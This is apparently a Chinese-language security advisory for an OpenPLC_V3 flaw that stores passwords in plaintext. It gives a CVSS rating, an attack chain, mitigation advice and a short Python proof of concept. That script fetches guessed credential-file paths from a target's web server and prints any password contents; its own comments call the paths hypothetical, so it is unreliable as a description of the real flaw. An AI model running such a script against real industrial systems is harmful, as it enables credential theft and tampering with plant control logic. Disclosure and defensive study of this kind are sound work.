CVE-2026-35556 CVSS 7.5 高危

CVE-2026-35556 OpenPLC_V3 密码明文存储漏洞

披露日期: 2026-04-09

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35556

漏洞类型

信息泄露

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

OpenPLC_V3

漏洞概述

OpenPLC_V3 存在密码明文存储漏洞。该漏洞源于系统未对敏感凭证进行加密处理，直接以明文形式存储用户密码。攻击者无需认证即可通过网络访问获取这些凭证，进而利用窃取的凭据登录系统，访问敏感信息或进一步控制受影响的工业控制设备。

技术细节

该漏洞属于典型的信息泄露问题，核心在于 OpenPLC_V3 软件在用户账户管理模块中存在设计缺陷。系统未遵循安全开发生命周期（SDLC）中的密码存储最佳实践，直接将用户密码以明文形式存储在服务器端的配置文件或数据库文件中（如 XML、JSON 或文本文件）。根据 CVSS 3.1 评分向量（AV:N/AC:L/PR:N/UI:N），攻击者无需用户认证即可通过网络发起攻击。利用方式通常涉及直接请求特定的敏感文件路径或访问未授权的 API 接口。攻击者成功获取明文密码后，不仅能够绕过身份验证机制登录管理后台，还可能利用提升的权限修改 PLC 控制逻辑，导致工业生产流程中断或设备损坏。由于工控环境的特殊性，此类漏洞的潜在危害极大。

攻击链分析

STEP 1

侦察

攻击者扫描网络，识别出运行 OpenPLC_V3 的目标设备。

STEP 2

漏洞利用

攻击者无需认证，直接通过网络访问存储明文密码的特定文件路径或接口。

STEP 3

凭证获取

成功读取文件内容，解析出管理员或用户的用户名和明文密码。

STEP 4

权限提升与控制

利用获取的凭证登录 OpenPLC Web 界面，获得系统控制权，修改 PLC 逻辑或窃取数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def check_openPLC_creds(target_ip):
    # Target URL of the OpenPLC web server
    base_url = f"http://{target_ip}:8080"
    
    # Common path where credentials might be stored in plaintext (Hypothetical path)
    # Based on the vulnerability description of plaintext storage.
    sensitive_paths = [
        "/webserver/users.json",
        "/users.db",
        "/config/passwd.txt"
    ]

    print(f"[*] Checking {target_ip} for plaintext credentials...")

    for path in sensitive_paths:
        url = base_url + path
        try:
            response = requests.get(url, timeout=5)
            if response.status_code == 200:
                print(f"[+] Potential credential file found at: {url}")
                print("[+] Content:")
                print(response.text)
                # Analyze content for password fields
                if "password" in response.text.lower():
                    print("[!] WARNING: Plaintext passwords detected in response!")
        except requests.RequestException as e:
            continue

if __name__ == "__main__":
    # Replace with actual target IP
    target = "192.168.1.100"
    check_openPLC_creds(target)

影响范围

OpenPLC_V3

防御指南

临时缓解措施

建议立即将 OpenPLC_V3 升级至官方发布的最新安全版本。若暂时无法升级，应通过网络访问控制列表（ACL）严格限制对 OpenPLC 系统的访问，仅允许可信的管理终端连接，并密切监控系统日志以防凭证已被窃取。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表